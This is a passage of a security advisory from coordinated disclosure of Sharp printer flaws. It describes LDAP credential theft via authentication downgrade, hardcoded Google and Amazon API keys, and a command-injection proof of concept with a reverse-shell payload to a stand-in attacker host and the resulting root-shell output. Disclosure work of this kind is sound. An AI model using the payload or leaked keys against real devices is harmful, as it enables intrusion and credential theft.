## Details - Exfiltration of LDAP credentials by downgrading the security  
  
Sharp printers can be configured with a connection to a LDAP server,  
with credentials.  
  
While the LDAP password is not shown on the web interface, an attacker  
with the admin password can retrieve the password by downgrading the  
authentication type to `SIMPLE`, which will enable clear-text  
communication to a malicious server.  
  
With the `Connect Test`, an attacker can downgrade the security of the  
authentication to `SIMPLE` and retrieve the password in clear-text by  
specifying a malicious OpenLDAP server:  
  
LDAP Configuration - http://10.0.0.1/nw_ldap_entry.html?ldapid=0:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
With a malicious OpenLDAP server receiving the connection, the  
password will be displayed in the logs:  
  
kali# /usr/sbin/slapd -d 10 -f /etc/ldap/slapd.conf -h "ldap:/// ldaps:///"  
6458d55e.3103c227 0x7fe72981e200 @(#) $OpenLDAP: slapd  
2.5.13+dfsg-5 (Feb 8 2023 01:56:12) $  
Debian OpenLDAP Maintainers  
<pkg-openldap-devel@lists.alioth.debian.org>  
6458d55e.319e91af 0x7fe72981e200 slapd starting  
6458d55e.31a5bad7 0x7fe727bff6c0 daemon: added 4r listener=(nil)  
6458d55e.31a6707c 0x7fe727bff6c0 daemon: added 7r listener=0x5586390ead60  
6458d55e.31a6b53d 0x7fe727bff6c0 daemon: added 8r listener=0x5586390eae30  
6458d55e.31a6f00d 0x7fe727bff6c0 daemon: added 9r listener=0x5586390ea740  
6458d55e.31a7661d 0x7fe727bff6c0 daemon: added 10r listener=0x5586390ea810  
6458d55e.31a94b33 0x7fe727bff6c0 daemon: epoll: listen=7  
active_threads=0 tvp=zero  
6458d55e.31a96f6a 0x7fe727bff6c0 daemon: epoll: listen=8  
active_threads=0 tvp=zero  
6458d55e.31a97916 0x7fe727bff6c0 daemon: epoll: listen=9  
active_threads=0 tvp=zero  
6458d55e.31a981b7 0x7fe727bff6c0 daemon: epoll: listen=10  
active_threads=0 tvp=zero  
6458d55e.31a9933f 0x7fe727bff6c0 daemon: activity on 1 descriptor  
6458d55e.31a99baf 0x7fe727bff6c0 daemon: activity  
on:6458d55e.31a9a375 0x7fe727bff6c0  
6458d55e.31a9b6dc 0x7fe727bff6c0 daemon: epoll: listen=7  
active_threads=0 tvp=zero  
6458d55e.31a9d392 0x7fe727bff6c0 daemon: epoll: listen=8  
active_threads=0 tvp=zero  
6458d55e.31a9dc6e 0x7fe727bff6c0 daemon: epoll: listen=9  
active_threads=0 tvp=zero  
6458d55e.31a9f2b6 0x7fe727bff6c0 daemon: epoll: listen=10  
active_threads=0 tvp=zero  
6458d562.355e84dc 0x7fe727bff6c0 daemon: activity on 1 descriptor  
6458d562.355f3b42 0x7fe727bff6c0 daemon: activity  
on:6458d562.355f593f 0x7fe727bff6c0  
6458d562.355fde77 0x7fe727bff6c0 daemon: epoll: listen=7 busy  
6458d562.355ffeb9 0x7fe727bff6c0 daemon: epoll: listen=8  
active_threads=0 tvp=zero  
6458d562.35601b67 0x7fe727bff6c0 daemon: epoll: listen=9  
active_threads=0 tvp=zero  
6458d562.3560372e 0x7fe727bff6c0 daemon: epoll: listen=10  
active_threads=0 tvp=zero  
6458d562.35638596 0x7fe7273fe6c0 daemon: accept() = 14  
6458d562.35646744 0x7fe7273fe6c0 daemon: listen=7, new connection on 14  
6458d562.3564fc1e 0x7fe727bff6c0 daemon: activity on 1 descriptor  
6458d562.35656f57 0x7fe727bff6c0 daemon: activity  
on:6458d562.35658b4c 0x7fe727bff6c0  
6458d562.3565d7f5 0x7fe727bff6c0 daemon: epoll: listen=7  
active_threads=0 tvp=zero  
6458d562.3565fb50 0x7fe727bff6c0 daemon: epoll: listen=8  
active_threads=0 tvp=zero  
6458d562.356615c1 0x7fe727bff6c0 daemon: epoll: listen=9  
active_threads=0 tvp=zero  
6458d562.35662d31 0x7fe727bff6c0 daemon: epoll: listen=10  
active_threads=0 tvp=zero  
6458d562.35691b42 0x7fe7273fe6c0 daemon: added 14r (active) listener=(nil)  
6458d562.356a5b81 0x7fe727bff6c0 daemon: activity on 2 descriptors  
6458d562.356b0c68 0x7fe727bff6c0 daemon: activity  
on:6458d562.356b54fa 0x7fe727bff6c0 14r6458d562.356b948e  
0x7fe727bff6c0  
6458d562.356bfc9e 0x7fe727bff6c0 daemon: read active on 14  
6458d562.356ce70e 0x7fe727bff6c0 daemon: epoll: listen=7  
active_threads=0 tvp=zero  
6458d562.356d5571 0x7fe727bff6c0 daemon: epoll: listen=8  
active_threads=0 tvp=zero  
6458d562.356db465 0x7fe727bff6c0 daemon: epoll: listen=9  
active_threads=0 tvp=zero  
6458d562.356e155f 0x7fe727bff6c0 daemon: epoll: listen=10  
active_threads=0 tvp=zero  
6458d562.356f5783 0x7fe7273fe6c0 ldap_read: want=8, got=8  
6458d562.356f9399 0x7fe7273fe6c0 0000: 30 31 02 01 01 01 01 01  
01......  
6458d562.356fd33a 0x7fe7273fe6c0 ldap_read: want=43, got=43  
6458d562.3570169a 0x7fe7273fe6c0 0000: 01 03 04 15 6c 64 61 70  
2d 63 72 65 64 73 35 40 ....ldap-creds5@  
6458d562.357033a1 0x7fe7273fe6c0 0010: 64 6f 6d 61 69 6e 2e 6c  
61 2e 2e 50 41 53 53 57 domain.la..PASSW  
6458d562.35704d44 0x7fe7273fe6c0 0020: 4f 52 44 2d 49 4e 2d 43  
4c 45 41 52 ORD-IN-CLEAR  
6458d562.357231ef 0x7fe7273fe6c0 ldap_read: want=8 error=Resource  
temporarily unavailable  
  
It is also possible to use wireshark to display the password.  
  
  
  
## Details - Hardcoded Google API Keys  
  
The printers contain private API Keys in the `main` program.  
  
It is possible to retrieve specific googlecontent.com domain names in  
the main program:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
Reverse Engineering of the `sub_2146D54()` function defined in the  
main program will reveal some hardcoded keys:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The domains listed in the binary are:  
  
- - 265490466885-m5cjvglv9q8aak493cgepe7juvafgh8c.apps.googleusercontent.com  
- - 347970444986-0pij6u2tfhb240edjmls3h1u8qm2v2b3.apps.googleusercontent.com  
- - 410988772526-6ujegl6jvquh9kstiegva8fk5j2ogag9.apps.googleusercontent.com  
- - 292646726735-033ggn9hmlrs8bntrj0fbstob9m8qt26.apps.googleusercontent.com  
  
These domains do not appear to be used anymore and are free for any  
user. An attacker can use them to receive traffic from the printers.  
  
  
  
## Details - Hardcoded Amazon API Keys  
  
The printers contain private API Keys in the `main` program.  
  
It is possible to retrieve a specific amazonaws.com address in the  
`main` program:  
  
- - https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics  
  
When Cross-referencing this address, it appears that some private API  
keys are hardcoded in the program, as shown below:  
  
- - Postman private key: `44688039-5104-39be-f974-c1f5ef621a5f`  
- - API-KEY: `PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9YwWA`  
  
Reverse Engineering of the sub_20D542C function defined in the `main` program:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
We can see that curl is invoked with the `-k` option (aka  
`--insecure`) so any invalid SSL certificate will be accepted:  
  
The pseudo-code of `sub_20D542C()` is:  
  
int __fastcall sub_20D542C(const char *a1, const char *a2)  
{  
...  
if ( sub_6A0DA0(606420, 0) )  
{  
sub_6A174C((char *)&loc_940DC + 2, v4, 255);  
sub_6A174C((char *)&loc_940DC + 3, v6, 80);  
sub_6A174C(606432, v7, 80);  
if ( !*v6 )  
j_strncpy_0(v6, "user", 0x50u);  
v11 = sub_6A107C(&loc_940E8, 3080);  
j_snprintf(  
v9,  
0x800u,  
"/usr/bin/curl -k -o %s -U %s:%s -x %s:%d -X POST -d  
@\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDut"  
"aXS9YwWA\" -H \"Cache-Control: no-cache\" -H  
\"Postman-Token: 44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"",  
a2,  
v6,  
v7,  
v4,  
v11,  
a1,  
  
"https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics");  
sub_20D7E20(  
"[analy][curl] /usr/bin/curl -k -o %s -U %s:xxx -x  
%s:%d -X POST -d @\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Q"  
"e1EQUaF9ZaKvTDutaXS9YwWA\" -H \"Cache-Control:  
no-cache\" -H \"Postman-Token: 44688039-5104-39be-f974-c1f5ef"  
"621a5f\" -L \"%s\"\n",  
a2,  
v6,  
v4,  
v11,  
a1,  
  
"https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics");  
}  
else  
{  
j_snprintf(  
v9,  
0x800u,  
"/usr/bin/curl -k -o %s -X POST -d @\"%s\" -H  
\"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9YwWA\" -H \"Ca"  
"che-Control: no-cache\" -H \"Postman-Token:  
44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"",  
a2,  
a1,  
  
"https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics");  
sub_20D7E20(  
"[analy][curl] /usr/bin/curl -k -o %s -X POST -d  
@\"%s\" -H \"x-api-key: PBYXSIK6av8fBt8Qe1EQUaF9ZaKvTDutaXS9"  
"YwWA\" -H \"Cache-Control: no-cache\" -H  
\"Postman-Token: 44688039-5104-39be-f974-c1f5ef621a5f\" -L \"%s\"\n",  
a2,  
a1,  
  
"https://7db3z5d116.execute-api.ap-northeast-1.amazonaws.com/prod/MFPDataAlalytics");  
}  
v12 = j_mfp_system((int)v9);  
  
  
  
## Details - CVE-2022-45796 - RCE  
  
Since the PoC for CVE-2022-45796 was not public, an authenticated  
admin user can go to http://ip/nw_interface.html and use the IPv6 IP  
field to exploit a command injection:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
Using Burp, an attacker can intercept the resulting request and inject  
a command inside the vulnerable `ggt_textbox(16)` field, for example,  
`ggt_textbox%2816%29=%7Cbash+-i+%3E%26+%2Fdev%2Ftcp%2Fattacker_ip%2F443+0%3E%261`  
corresponding to the payload `|bash -i /dev/tcp/attacker_ip/443 0>&1`.  
  
The attacker will receive a root shell from the printers and will get  
a full admin access, allowing to backdoor the printer for persistence:  
  
kali% nc -l -v -p 443  
listening on [any] 443 ...  
10.0.0.1: inverse host lookup failed: Unknown host  
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.1] 58196  
bash: cannot set terminal process group (619): Inappropriate ioctl  
for device  
bash: no job control in this shell  
bash-4.3# id  
uid=0(root) gid=0(root) groups=0(root)  
bash-4.3# uname -ap  
Linux SC58C36B 4.1.46-rt52 #2 SMP PREEMPT RT Fri Apr 26 12:29:16  
JST 2019 aarch64 GNU/Linux  
bash-4.3# ps -auxww | grep ping  
root 5022 0.0 0.0 1916 368 ? S 09:34 0:00 grep ping  
root 28966 0.0 0.0 2876 1940 ? S 09:33 0:00  
sh -c ping6 -c 1 -W 2 |bash -i >& /dev/tcp/10.0.0.10/443 0>&1  
bash-4.3#  
init-+-aarch64-fsl-lin  
|-access_audit_mg  
|-bcr_iface  
|-blackscreen_mon  
|-check_hash_daem  
|-cmd_proc  
|-cpu_state  
|-dbus-daemon  
|-dout_daemon---14*[{dout_daemon}]  
|-dummy_init  
|-getty  
|-intsrt  
|-linter  
|-mgrcpuif_r1b---2*[{mgrcpuif_r1b}]  
|-mgrcpuif_r1c---2*[{mgrcpuif_r1c}]  
|-nfcproc---7*[{nfcproc}]  
|-ocrsrv---21*[{ocrsrv}]  
|-oom_watch  
|-poff_reboot  
|-pulseaudio---{null-sink}  
|-rc---S998linuxApp-+-IFS---20*[{IFS}]  
| |-main-+-preview---48*[{preview}]  
| | |-sxlinklocald  
| | `-514*[{main}]  
| |-netp---netp---sh---bash---pstree  
| |-pdl---43*[{pdl}]  
| |-reus_lcd_mgr---{reus_lcd_mgr}  
| |-rtc_manager---{rtc_manager}  
| |-2*[seriallink---6*[{seriallink}]]  
| |-sound_play-+-14*[{sound_play}]  
| | `-{threaded-ml}  
| |-startx---xinit-+-X  
| | `-sh-+-NX---7*[{NX}]  
| |  
|-ui_mainview---12*[{ui_mainview}]  
| |  
`-ui_subview---7*[{ui_subview}]  
| |-usbch_mgr  
| |-vmstat  
| |-watch_proc  
| `-wlctlproc---6*[{wlctlproc}]  
|-2*[rotate]  
|-rsyslogd-+-{in:imklog}  
| |-{in:immark}  
| |-{in:imuxsock}  
| `-{rs:main Q:Reg}  
|-system_reset---6*[{system_reset}]  
`-udevd---2*[udevd]  
bash-4.3#  
  
  
  
## Vendor Response  
  
JPCERT provided a security bulletin:  
https://jvn.jp/en/vu/JVNVU93051062/index.html.  
  
Sharp provided a security bulletin:  
https://global.sharp/products/copier/info/info_security_2024-05.html.  
  
Toshiba provided a security bulletin:  
https://www.toshibatec.com/information/20240531_02.html.  
  
  
  
## Report Timeline  
  
* May 2023: Security assessment performed on Sharp Multi-function printers.  
* June 1, 2023: A complete report was sent to JPCERT (security contact  
for Sharp).  
* June 6, 2023: JPCERT aknowledged the reception of the security  
assessment and asked more information about the security contact.  
* June 7, 2023: Information about the security contact provided to JPCERT.  
* June 7, 2023: JPCERT confirmed the reception of the security contact.  
* Jul 17, 2023: Questions sent to JPCERT asking for any feedback from Sharp.  
* Jul 18, 2023: JPCERT confirmed that they had a meeting with Sharp a  
week ago. Sharp finished the investigation and was preparing a  
document listing all the issues.  
* Jul 25, 2023: JPCERT provided the Excel file with Sharp's comments.  
* Jul 26, 2023: I confirmed the reception of the documents  
* Jul 28, 2023: Comments sent to JPCERT in the Excel file to ask to  
re-evaluate some issues.  
* Aug 1, 2023: Received responses from JPCERT regarding some of the issues.  
* Aug 1, 2023: Additional information provided to JPCERT regarding a  
potential disclosure of vulnerabilities if the issues are not patched.  
I suggested a tripartite meeting with Sharp and JPCERT to review the  
issues.  
* Aug 2, 2023: JPCERT suggested solutions to get security patches in a  
timely manner by prioritizing issues.  
* Aug 3, 2023: Agreed with JPCERT to prioritize vulnerabilities based  
on severity, then patch critical vulnerabilities as soon as possible  
while delaying hard-to-fix vulnerabilities.  
* Aug 4, 2023: JPCERT confirmed that they are working with Sharp to  
get the issues fixed.  
* Aug 16, 2023: JPCERT confirmed that they asked Sharp to reconsider  
some of the issues with two buckets (short-term fixes and long-term  
countermeasures) and that Sharp was working on the issues.  
* Sep 13, 2023: I answered that it is an acceptable practice, since  
short-term fixes and long-term countermeasures are currently being  
implemented by other printer vendors.  
* Sep 14, 2023: JPCERT confirmed that they are working with Sharp to  
get security patches.  
* Oct 10, 2023: I confirmed the reception of the updates.  
* Nov 16, 2023: JPCERT provided a new Excel file with the issues and  
the countermeasures provided by Sharp.  
* Nov 21, 2023: Excel file was reviewed and Sharp suggested to patch  
vulnerable code and remove vulnerable features.  
* Jan 29, 2024: Asking about the status of the vulnerabilities (CVE,  
availability of security patches).  
* Jan 30, 2024: JPCERT confirmed that a JVN advisory will be published  
with corresponding CVEs. Security patches will be provided by May  
2024.  
* Jan 30, 2024: I suggested to test patched firmware images to confirm  
that vulnerabilities were correctly patched.  
* Jan 31, 2024: JPCERT passed the message to Sharp regarding  
additional tests of patched firmware images.  
* Feb 16, 2024: JPCERT sent the updated Excel file containing the  
vulnerabilities.  
* Feb 16, 2024: Confirmation of the reception of the Excel file.  
* Feb 20, 2024: Updated Excel file sent to JPCERT with my comments.  
* Mar 1, 2024: JPCERT sent comments regarding my feedbacks.  
* Mar 4, 2024: I confirmed the reception of the feedbacks.  
* May 8, 2024: Email asking JPCERT when the security advisories and  
security patches will be published.  
* May 16, 2024: JPCERT sent a list of affected products/versions and  
confirmed that they are working on a draft.  
* May 20, 2024: I suggested to include unsupported models since, based  
on my testing, some unsupported models were vulnerable.  
* May 21, 2024: JPCERT reported sending this suggestion to Sharp.  
* May 28, 2024: JPCERT provided the JVN English edition draft  
advisory, the final list of affected products and Toshiba Tech MFPs  
information.  
* May 28, 2024: I asked JPCERT to provide me with the list of CVEs for  
the list of vulnerabilities I reported.  
* May 29, 2024: JPCERT provided a list of vulnerabilities along with  
CVEs and clarifications regarding some of the findings.  
* May 30, 2024: Confirmation sent to JPCERT that the list was received.  
* May 31, 2024: JPCERT published a security advisory:  
https://jvn.jp/en/vu/JVNVU93051062/index.html.  
* May 31, 2024: Sharp published a security advisory:  
https://global.sharp/products/copier/info/info_security_2024-05.html.  
* May 31, 2024: Toshiba published a security advisory:  
https://www.toshibatec.com/information/20240531_02.html.  
* June 27, 2024: A security advisory is published.  
  
  
  
## Credits  
  
These vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec).  
  
  
  
## References  
  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html  
  
https://pierrekim.github.io/advisories/2024-sharp-mfp.txt  
  
https://jvn.jp/en/vu/JVNVU93051062/index.html  
  
https://global.sharp/products/copier/info/info_security_2024-05.html  
  
https://www.toshibatec.com/information/20240531_02.html  
  
  
  
## Disclaimer  
  
This advisory is licensed under a Creative Commons Attribution Non-Commercial  
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmZ9pYoACgkQxD4O2n2T  
Lbx2Iw//TIRFzVnpQwVpk/SHRg/f7MHlQmTeSmXTJiataDytUiio8OtfWpkAHLy6  
KTPW0XHxkGBrndZbeay/hmyDHKH5yrhrzF/OqXHetZVDKx7bzFBAkFTeuPQdgyv4  
xQmfmv3DbvSrfCXMnNTMvh4XE1JT4l4Ng4fbOxx3x5s7cgBKpsw5QO045nsrWmIN  
9L9mqY3h6o0lmcPt04HO/Th1sREbNeeSzg6S5jwdM77ZZQkXg6NQ3Fob+RJkd2oK  
tJJF3t48j1aIVRoW/RAaxL0bkzbxnWC0OSKYmGSNKGlXsmpQ6BNf5baLl4ursSO/  
iIeVYhIgLNIL0NwbInbDWIBsDjEVpAh74BDBrHAafzLryPYZUL+jBw0CkJxUkyxg  
HbR/AbpHe+aXR6semM1E3pWmu2Z3Z1qGUIef+NULYUHPIpSNFqQ9sfQmzStRvz1z  
unFOhjuOMlMFoPcDa3eL/iJOl64fNE/tu4Qi+ytt8gyy6sEFj0ZOXLJMNBg30E+s  
aRdE+eAiVVp+/Pj+O4+YGYtUzwNyW2RgdLtAXihBVzFlprSA/26scNog39zgxPQ+  
M7qjcVCxFvoL6kKvf/Y0aDvXT27Z+yV5G5l3v29XbB77az+i5TzA9d9LSfcZv6+r  
H5tsJlPs6r65uRi3JGNDBTnkW85UENOwpnwLiCrYJwhrExUjky0=  
=cwDH  
-----END PGP SIGNATURE-----  
  
  
--   
Pierre Kim  
pierre.kim.sec@gmail.com  
@PierreKimSec  
https://pierrekim.github.io/